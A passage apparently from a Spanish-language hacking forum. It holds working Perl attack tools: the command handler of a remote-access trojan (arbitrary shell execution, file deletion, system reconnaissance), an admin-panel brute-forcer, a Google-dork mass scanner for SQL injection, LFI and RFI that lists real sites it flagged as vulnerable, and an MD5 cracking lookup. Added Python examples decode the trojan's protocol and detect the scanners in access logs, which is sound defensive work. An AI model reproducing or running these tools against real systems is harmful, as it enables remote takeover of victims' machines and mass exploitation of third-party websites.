    my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
    my $rta = ' ' x 127; 
    $ventana->Call('set CDAudio door closed', $rta, 127, 0);
    print $con "ok"."\r\n";
    }

    if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) {

    my $filex = $1;

    $filex =~s/(\s)+$//;

    print getcwd()."/".$filex."\n\n";

    if (unlink(getcwd()."/".$filex)) {
    print $con "ok\r\n";
    }

    }



    if ($resultado=~/infor/ig) {
    print "mando";
    use Win32;


    my $domain = Win32::DomainName();
    my $chip = Win32::GetChipName();
    my $version = Win32::GetOSVersion();
    my $nombre = Win32::LoginName();
    my  $os = Win32::GetOSName();

    print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n";
    }


    if ($resultado=~/porters/ig) {

    use Net::Netstat::Wrapper;

    $por = "";
    @ports = Net::Netstat::Wrapper->only_port();
    for(@ports) {
    $por = $por.":".$_;
    }
    print $con $por."\r\n";
    }


    if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) {

    my $cancion = $1;

    $cancion =~s/(\s)+$//;

    $test->load($cancion);
    $test->play;

    }

    if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) {

    my $dir = $1;
    $dir =~s/(\s)+$//;


    if (chdir($dir)) {
    print $con "ok\r\n";
    }

    }

    if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) {

    my $veox = $1;
    $veox =~s/(\s)+$//;

    if (rmdir(getcwd()."/".$veox)) {
    print $con "ok\r\n";
    }
    }



    if ($resultado=~/pararmusic/ig) {
    $test->close;
    }



    if ($resultado=~/dirnow ACATOY(.*)/ig) {

    my $real = $1;
    chomp $real;

    $real =~s/(\s)+$//;

    print "real $real\n\n";

    my @archivos = coleccionar($real);

    for (@archivos) {
    print $_."\n";
    my $todo = $real."/".$_;

    print $todo."\n";

    if (-f $todo) {
    print $con "FILEX".$_."FILEX"."\r\n";
    print "File : ".$_."\n";
    }

    if (-d $todo) {
    print $con "DIREX".$_."DIREX"."\r\n";
    print "Dir : ".$_."\n";
    }

    }
    }

    sub coleccionar {
    opendir DIR,$_[0];
    my @archivos = readdir DIR;
    close DIR;
    return @archivos;
    }

    if ($resultado=~/getcwd/ig) {
    print "envie ".getcwd()."\n\n";
    print $con getcwd()."\r\n";
    }


    if ($resultado=~/mostrarpro/ig) {


    my $new = Win32::Process::List->new(); 
    my %process = $new->GetProcesses();
    for my $pid (keys %process) {
    print $con "PROXEC".$process{$pid}."PROXEC\r\n";
    print $con "PIDX".$pid."PIDX\r\n";

    }


    }

    if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) {
    my $name = $1;
    my $file = $2;

    chomp $name;
    chomp $file;

    $name =~s/(\s)+$//;
    $file =~s/(\s)+$//;

    print "name is $name end\n";
    print "file is $file end\n";

    open FILE,">>".$name;
    print FILE $file."\n";
    close FILE;
    }

    if ($resultado=~/comando :(.*):/ig) {
    print "llego comando $1\n";
    print $resultado;
    my $temp = qx($1);
    print $con $temp."\r";
    }

    if ($resultado=~/iniciochau/g) {
    inicio_chau("Shell_TrayWnd");
    }
    if ($resultado=~/iniciovuelve/g) {
    inicio_vuelve("Shell_TrayWnd");
    } else {
    print $resultado;
    }
    if ($resultado=~/iconovuelve/g) {
    icono_vuelve("Program Manager");
    }
    if ($resultado=~/iconochau/g) {
    icono_chau("Program Manager");
    }


    sub icono_vuelve {
    $handle = $a->Call(0,$_[0]);
    $b->Call($handle,SW_SHOWNORMAL);

    }

    sub icono_chau {

    $handle = $a->Call(0,$_[0]);
    $b->Call($handle,SW_HIDE);

    }

    sub inicio_vuelve {
    $handlex = $a->Call($_[0],0);
    $b->Call($handlex,SW_SHOWNORMAL);

    }

    sub inicio_chau {

    $handlea = $a->Call($_[0],0);
    $b->Call($handlea,SW_HIDE);

    }


    }


    # ¿ The End ?
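For incident response against traffic like this, the server's command set is its own detection signature: one plaintext line per TCP connection, dispatched by unanchored substring regexes. The following Python parser is an added example (not the author's code): it replays the server's dispatch regexes over captured payloads sent to its TCP 666 listener and rates each handler by impact; the sample payloads and the impact ratings are this example's own constructions.

```python
"""Decoder for the Nefaster client->server protocol (constructed example)."""
import re

C2_PORT = 666          # listener port from the server source
LOW, MED, HIGH, CRIT = "low", "medium", "high", "critical"

# (handler, server regex, impact rating) in the server's own dispatch order.
# The regexes are the server's; the ratings are this example's triage labels.
COMMAND_TABLE = [
    ("msgbox",       r"msgbox (.*)",                               LOW),
    ("backshell",    r"backshell :(.*):(.*):",                     CRIT),
    ("opencd",       r"opencd",                                    LOW),
    ("chauproce",    r"chauproce K0BRA(.*)K0BRA(.*)K0BRA",         HIGH),
    ("closedcd",     r"closedcd",                                  LOW),
    ("borrarfile",   r"borrarfile K0BRA(.*)K0BRA",                 HIGH),
    ("infor",        r"infor",                                     MED),
    ("porters",      r"porters",                                   MED),
    ("playmusic",    r"playmusic K0BRA(.*)K0BRA",                  LOW),
    ("chdirnow",     r"chdirnow K0BRA(.*)K0BRA",                   MED),
    ("borrardir",    r"borrardir K0BRA(.*)K0BRA",                  HIGH),
    ("pararmusic",   r"pararmusic",                                LOW),
    ("dirnow",       r"dirnow ACATOY(.*)",                         MED),
    ("getcwd",       r"getcwd",                                    MED),
    ("mostrarpro",   r"mostrarpro",                                MED),
    ("crearnow",     r"crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY",  HIGH),
    ("comando",      r"comando :(.*):",                            CRIT),
    ("iniciochau",   r"iniciochau",                                LOW),
    ("iniciovuelve", r"iniciovuelve",                              LOW),
    ("iconovuelve",  r"iconovuelve",                               LOW),
    ("iconochau",    r"iconochau",                                 LOW),
]
_COMPILED = [(n, re.compile(p, re.I), s) for n, p, s in COMMAND_TABLE]
_RANK = {LOW: 0, MED: 1, HIGH: 2, CRIT: 3}

# Reply framing used by the server: TAG<value>TAG, one item per line.
_REPLY_TAGS = {"PROXEC": "process", "PIDX": "pid", "FILEX": "file", "DIREX": "dir"}


def parse_command(payload):
    """Return [(handler, args, rating)] for every handler the server would run.

    The server tests each regex independently and case-insensitively as a
    substring, so one payload can fire several handlers (any text containing
    "infor", for instance, also triggers the system-info dump).
    """
    line = payload.rstrip("\r\n")
    hits = []
    for name, rx, rating in _COMPILED:
        m = rx.search(line)
        if m:
            # the server strips trailing whitespace from every captured argument
            hits.append((name, tuple(a.rstrip() for a in m.groups()), rating))
    return hits


def parse_reply(text):
    """Extract tagged items from a server reply, dropping empties like the client does."""
    out = {}
    for tag, key in _REPLY_TAGS.items():
        vals = [v for v in re.findall(tag + r"(.*?)" + tag, text) if v]
        if vals:
            out[key] = vals
    return out


def parse_process_list(reply):
    """Pair process names with PIDs from a 'mostrarpro' reply, starting at index 0
    (the original client loops 1..n and silently skips the first entry)."""
    r = parse_reply(reply)
    return list(zip(r.get("process", []), r.get("pid", [])))


def session_verdict(payloads):
    """Worst impact rating and the ordered handler names across a captured session."""
    worst, seen = None, []
    for p in payloads:
        for name, _args, rating in parse_command(p):
            seen.append(name)
            if worst is None or _RANK[rating] > _RANK[worst]:
                worst = rating
    return (worst or "none"), seen


# Constructed sample session (client -> port 666), not real captured traffic.
SAMPLE_SESSION = [
    "infor\r\n",
    "getcwd\r\n",
    "chdirnow K0BRAC:\\UsersK0BRA\r\n",
    "crearnow K0BRAnote.txtK0BRA ACATOYhello ACATOY\r\n",
    "comando :ipconfig /all:\r\n",
    "msgbox Informacion\r\n",
]

if __name__ == "__main__":
    for p in SAMPLE_SESSION:
        print(repr(p.rstrip()), "->", parse_command(p))
    print(session_verdict(SAMPLE_SESSION))
```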


#382
Scripting / [Perl] Panel Control 0.6
8 October 2011, 16:57 PM
The new version of this tool for finding the administration panel.

Code (perl)

#!usr/bin/perl
#Panel Control 0.6
#(C) Doddy Hackman 2011

use LWP::UserAgent;

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/'
,'autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/'
,'loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/'
,'sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/'
,'customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {
print "\n[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = toma($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
}
}
}

sub head {
print "\n\n-- == Panel Control == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0]);
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
#383
Scripting / [Perl] Paranoic Scan By Doddy H
8 October 2011, 16:56 PM
Hello.

Today I bring a program that I have been working on because I was tired of testing every
website I found on Google to see whether it had the vulnerability I wanted.
So that is why I made this tool, with the following options:

* Lets you scan a file of websites
* Lets you search Google, remove duplicates, and then scan


Scan types:

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOSURE



Usage example

@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136

[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=

[Status] : Finish



(C) Doddy Hackman 2010



Code (perl)

#!usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010

use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");





sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
}
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
}
return(repes(@r));
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #This is real knowledge xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}


sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub savewords {
open (FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
$t = clean($_);
push(@r,$t);
}
return(@r);
}

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com
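The three scanners above (MSSQL T00l, Panel Control and Paranoic Scan) leave recognisable request shapes in a web server's access log and all send the same, slightly malformed User-Agent string. As an added example that is not part of any of the posts, this Python script parses combined-format access logs and raises one alert set per source IP for each of those footprints; the log lines are constructed, and the admin-path spray threshold is an assumption to tune per site.

```python
"""Access-log triage for the probe shapes sent by the scanners above (constructed example)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Exact User-Agent set by every tool on this page; note the missing space before
# "Firefox", which makes an equality match unusually precise.
TOOL_UA = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) "
           "Gecko/20080201Firefox/2.0.0.12")

# Apache/nginx "combined" log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)'
    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Request-side signatures, matched against the URL-decoded request.
SIGNATURES = [
    # MSSQL T00l: ... and 1=convert(int,(select top 1 X from Y where X not in (...)))--
    ("mssql-error-based-sqli", re.compile(r"convert\(int,\(select\s+top\s+1\b", re.I)),
    ("information-schema-enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    # Paranoic Scan sql(): <param>=-1 union select 666--
    ("union-column-probe", re.compile(r"union\s+select\s+666", re.I)),
    # Paranoic Scan rfi(): a parameter whose value is itself a URL (the tool sends "http:/")
    ("rfi-probe", re.compile(r"=https?:/+[^&\s]*", re.I)),
]
# Panel Control requests every path in its list in one burst; several 404/403s on
# admin-like paths from one source is the footprint. The threshold is an assumption.
ADMIN_PATH_RE = re.compile(r"admin|login|cpanel|webmaster|moderator|controlpanel|sysadmin", re.I)
SPRAY_THRESHOLD = 3


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["url"])   # '+' -> ' ', %xx -> char, as the app saw it
    return rec


def match_signatures(rec):
    """Alert names raised by a single request record."""
    hits = [name for name, rx in SIGNATURES if rx.search(rec["decoded"])]
    if rec["ua"] == TOOL_UA:
        hits.append("known-scanner-user-agent")
    return hits


def triage(lines):
    """Map each offending source IP to the sorted list of alert names it triggered."""
    alerts = defaultdict(set)
    admin_misses = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name in match_signatures(rec):
            alerts[rec["ip"]].add(name)
        path = rec["decoded"].split("?", 1)[0]
        if rec["status"] in ("403", "404") and ADMIN_PATH_RE.search(path):
            admin_misses[rec["ip"]].add(path)
    for ip, paths in admin_misses.items():
        if len(paths) >= SPRAY_THRESHOLD:
            alerts[ip].add("admin-panel-spray")
    return {ip: sorted(names) for ip, names in alerts.items()}


def _line(ip, ts, request, status, ua=TOOL_UA):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{request}" {status} 512 "-" "{ua}"'


# Constructed sample log (RFC 5737 addresses); the probe shapes copy the tools above.
SAMPLE_LOG = [
    _line("203.0.113.5", "09/Oct/2011:17:47:01 -0300",
          "GET /profile.asp?m=1+and+1=convert(int,(select+top+1+table_name+from+"
          "information_schema.tables+where+table_name+not+in+('')))-- HTTP/1.1", 500),
    _line("203.0.113.5", "09/Oct/2011:17:47:03 -0300",
          "GET /ficha.php?id=-1+union+select+666-- HTTP/1.1", 200),
    _line("203.0.113.5", "09/Oct/2011:17:47:04 -0300",
          "GET /ficha.php?id=http:/rfi.example/ HTTP/1.1", 200),
    _line("198.51.100.7", "08/Oct/2011:16:57:10 -0300", "GET /admin/login.php HTTP/1.1", 404),
    _line("198.51.100.7", "08/Oct/2011:16:57:10 -0300", "GET /administrator/ HTTP/1.1", 404),
    _line("198.51.100.7", "08/Oct/2011:16:57:11 -0300", "GET /cpanel/ HTTP/1.1", 404),
    _line("192.0.2.44", "08/Oct/2011:16:58:00 -0300", "GET /ficha.php?id=12 HTTP/1.1", 200,
          ua="Mozilla/5.0 (X11; Linux x86_64) Firefox/7.0"),
]

if __name__ == "__main__":
    for ip, names in triage(SAMPLE_LOG).items():
        print(ip, names)
```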

#384
Scripting / [Perl] Pass Cracker By Doddy H
8 October 2011, 16:56 PM
Hello, here is a simple program to look up the decoding of an MD5 hash.


Code (perl)
#!/usr/bin/perl
#Pass Cracker 1.0
#(C) Doddy Hackman 2011

use strict;
use warnings;
use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <hash>\n\n";
} else {
crackit($ARGV[0]);
}
copyright();

sub crackit {

my $h = shift;   # the hash, captured once so the patterns below can interpolate it

print "\n[+] Cracking $h\n\n";

# One entry per lookup site: request type, POST form (a real hashref, not a
# string holding one) and a compiled regex that pulls the plaintext out of
# the response. \Q...\E keeps the hash literal inside the pattern.
my %hash = (

'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=> {"datafromuser" => $h, "submit" => "DoIT"},
'regex'=> qr{</td><td>md5 Database</td><td>\Q$h\E</td><td bgcolor=#FF0000>(.*)</td><td>}i,
},
'http://md5.hashcracking.com/search.php?md5=' =>  {
'tipo' => 'get',
'regex' => qr{Cleartext of \Q$h\E is (.*)}i,
},
'http://www.bigtrapeze.com/md5/' =>  {
'tipo' => 'post',
'variables'=> {"query" => $h, "submit" => " Crack "},
'regex' => qr{The hash <strong>\Q$h\E</strong> has been deciphered to: <strong>(.+)</strong>}i,
},
'http://opencrack.hashkiller.com/' =>  {
'tipo' => 'post',
'variables'=> {"oc_check_md5" => $h, "submit" => "Search MD5"},
'regex' => qr{</div><div class="result">\Q$h\E:(.+)<br/>}i,
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
'tipo' => 'post',
'variables'=> {"search_field" => $h, "Submit" => "search"},
'regex' => qr{<td><li>Your md5 hash is :<br><li>\Q$h\E is <b>(.*)</b> used charl}i,
},
'http://victorov.su/md5/?md5e=&md5d=' =>  {
'tipo' => 'get',
# the page is served in cp1251; these are the raw bytes of the Russian word "расшифрован" ("decoded")
'regex' => qr{MD5 \xF0\xE0\xF1\xF8\xE8\xF4\xF0\xEE\xE2\xE0\xED: <b>(.*)</b><br><form action="">},
}
);

for my $data (sort keys %hash) {
my $site = $hash{$data};
my $code = $site->{tipo} eq "get" ? toma($data.$h) : tomar($data,$site->{variables});
if ($code =~ $site->{regex}) {
print "\n[+] Decoded : ".$1." (".$data.")\n\n";
}
}
print "\n[+] Finish\n";
}

sub head {
print "\n\n-- == Pass Cracker == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,$var)->content;   # $var is the form hashref; post() takes it directly
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

Usage example:


perl crack.pl <hash>
#385
Scripting / [Perl] PasteBin Uploader
8 October 2011, 16:55
Well, here I have finished a program that will help you publish your programs
on pastebin quickly and effortlessly xDDD

So, this program has two options:

  • Publish a single file
  • Publish every file in a directory

    It also detects the file extension so the code is published under its proper syntax type

    Code (perl):
    #!/usr/bin/perl
    #Paste Bin Uploader (C) Doddy Hackman 2011

    use LWP::UserAgent;
    use HTTP::Request::Common;

    my $nave = LWP::UserAgent->new();
    $nave->timeout(10);
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

    menu();

    sub menu {

    clean();
    header();

    print "\n\n[Options]\n\n";
    print "[1] : Upload a file\n";
    print "[2] : Upload a directory\n";
    print "[3] : Exit\n\n";
    print "[Option] : ";
    chomp(my $op = <stdin>);

    if ($op eq 1) {
    print "\n\n[File] : ";
    chomp(my $file = <stdin>);

    if (-f $file)  {

    ($name,$exta) =verfile($file);

    my $ext = extensiones($exta);

    if ($ext ne "Yet") {


    $code = openfile($file);

    $re = lleva($name,$code,$ext);

    print "\n\n[+] File : $file\n";
    print "[+] Link : ".$re."\n";

    savefile("uploads_paste.txt","\n[+] File : $file");
    savefile("uploads_paste.txt","[+] Link : ".$re);

    }


    } else {
    print "\n\n[-] Error\n\n";
    }
    reload();
    }

    elsif ($op eq 2) {

    print "\n\n[Directory] : ";
    chomp(my $dir = <stdin>);

    if (-d $dir) {

    my @files = verdir($dir);

    print "\n\n[+] Loading directory\n";

    for my $file(@files) {

    chomp $file;

    my ($name,$exta) =verfile($file);

    my $ext = extensiones($exta);

    if ($ext ne "Yet") {

    my $code = openfile($dir."/".$file);

    $re = lleva($name,$code,$ext);

    print "\n\n[+] File : $file\n";
    print "[+] Link : ".$re."\n";

    savefile("uploads_paste.txt","\n[+] File : $file");
    savefile("uploads_paste.txt","[+] Link : ".$re);

    }
    }
    } else {
    print "\n\n[-] Error\n\n";
    }

    reload();
    }

    elsif ($op eq 3) {
    copyright();
    <stdin>;
    exit(1);
    }

    else {
    menu();
    }
    }

    sub copyright {
    print "\n\n(C) Doddy Hackman 2011\n\n";
    }

    sub header {

    print q(

    PPPP     AA     SSSSTTTTTTEEEE    BBBB   II NN   NN     UU  UU  PPPP
    PP PP    AA    SS  S  TT  EE      BB BB  II NNN  NN     UU  UU  PP PP
    PP PP   AAAA   SS     TT  EE      BB BB  II NNNN NN     UU  UU  PP PP
    PPPP    A  A    SSS   TT  EEEE    BBBB   II NN N NN     UU  UU  PPPP
    PP     AAAAAA     SS  TT  EE      BB BB  II NN NNNN     UU  UU  PP  
    PP     AA  AA  S  SS  TT  EE      BB BB  II NN  NNN     UUUUUU  PP  
    PP     AA  AA  SSSS   TT  EEEE    BBBB   II NN   NN      UUUU   PP  


    );

    }

    sub clean {
    system("cls");
    }



    sub verdir{
    my $dir = $_[0];
    my @found;
    opendir(my $dh,$dir) or return @found;
    for my $entry (readdir $dh) {
    push(@found,$entry) if -f $dir."/".$entry;   # files only, skip subdirectories
    }
    closedir $dh;
    return @found;   # lexical: a second call no longer re-lists the previous directory
    }

    sub verfile {
    if ($_[0]=~/(.*)\.(.*)/ig) {
    return ($1,$2);
    }
    }

    sub extensiones {

    my $code;
